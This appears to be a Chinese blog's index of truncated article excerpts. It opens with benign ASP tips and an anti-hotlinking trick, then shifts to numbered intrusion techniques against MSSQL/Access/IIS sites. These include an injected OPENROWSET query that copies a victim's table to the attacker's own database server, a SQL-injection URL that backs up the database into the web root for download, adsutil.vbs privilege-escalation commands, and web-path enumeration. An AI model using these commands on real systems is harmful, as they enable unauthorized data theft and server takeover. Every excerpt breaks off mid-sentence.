叮咛你站在桥上看风景，看风景的人在楼上看你。明月装饰了你的窗子，你装饰了别人的梦。

On Error Resume Next 这条语句是用来屏蔽出错信息,当出错时,使得程序继续执行的,不过在使用中,似乎很多人没有考虑到On Error Resume Next的作用范围.比如:

<%
On Error Resume Next
Set Conn=Server.CreateObject("ADODB.Connection")
Conn.Open "Provider=Microsoft.Jet.OLED...

由于时间在字符串中的值不一致性，会出现以下几中格式的字符串，没有办法用left,right,mid直接来获取，所以想到用正则表达式来实现这个功能（只要将这个功能改一下，就可以获取其他格式的字符串。


<%
'str = "2007-01-01 12:12:12 问题 1234"
'str="sdfd 01-01 12:12:12 问题"
'str="2007-01-01 12:12s...

本文介绍如何使用简单的小技巧来防止图片被盗链。如果您博客的图片是外包给相册网站的话，那么您可以去浏览其它网站了，本文对您没有任何用处，只会浪费您宝贵的时间。 一般情况下，网站的图片代码是这样的。

<img src="./attachments/test.jpg" />

右键点击图片，选择属性就可以看到图片的真实地址。这样就让其它网站有机可乘，盗链您网站的图片。我们可以利用一个小技巧来防止这种情况。

新...

SQL注入流行很久了，我们找漏洞注入目的无非是想得到数据库内的东西，比如用户名密码等，更进一步的MSSQL数据库还可以借此获得权限。基于Access的基础来说，如果我们不用注入就可以得到整个数据库，不是更好吗？于是暴库成了一个比注入更简单的入侵手段。
有关暴库的方法，高手们常在入侵文章中提到，但多是一笔带过，有些就某一个方法谈的，也多是就方法进行探讨。最近有一篇《再谈%5c暴库的利用》的文章，算是对暴库进行了一些总结，因而在网是流传很广。但仍没有谈及原理，而且结论也只是就于经验，似是而非，...

33、DB_OWNER权限下的数据库备份方法
用openrowset吧。反连到自己的数据库机器，~先在本地建个跟目标机器一样结构的表~字段类型使用nvarchar.然后用海洋连接对方的SQL数据库，在查询分析那里执行
insert into OPENROWSET ('sqloledb','server=你数据库服务器的IP;uid=user;pwd=pass;database=dbname;', 'select * from 你建立的表) select * from 对方的表&m...

30、sa 权限下已知web路径直接备份数据库到web路径下

http://www.XXXX.com/FullStory.asp?id=1;backuup database 数据库名 to disk='c:\inetpub\wwwroot\save.db' 则把得到的数据内容全部备份到WEB目录下，再用HTTP把此文件下载(当然首选要知道WEB虚拟目录)。

? 遍历系统的目录结构，分析结果并发现WEB虚拟目录，先创建一个临时表：temp
http...

21、win2000下将WEB用户提升为系统用户权限，需要有管理员的权限才能执行：
c:\>cscript C:\Inetpub\AdminScripts\adsutil.vbs set /W3SVC/InProcessIsapiApps "C:\WINNT\system32\idq.dll" "C:\WINNT\system32\inetsrv\httpext.dll" "C:\WINNT\system32\inetsrv\http...

20、寻找网站路径的方法汇总：
1）查看WEB网站安装目录命令：
? cscript c:\inetpub\adminscripts\adsutil.vbs enum w3svc/2/root >c:\test1.txt （将2换成1、3、4、5试试）
type c:\test1.txt
del c:\test1.txt
在NBSI下可以直接显示运行结果，所以不用导出到文件

2）在网站上随便找到一个图片的名字 123.jp...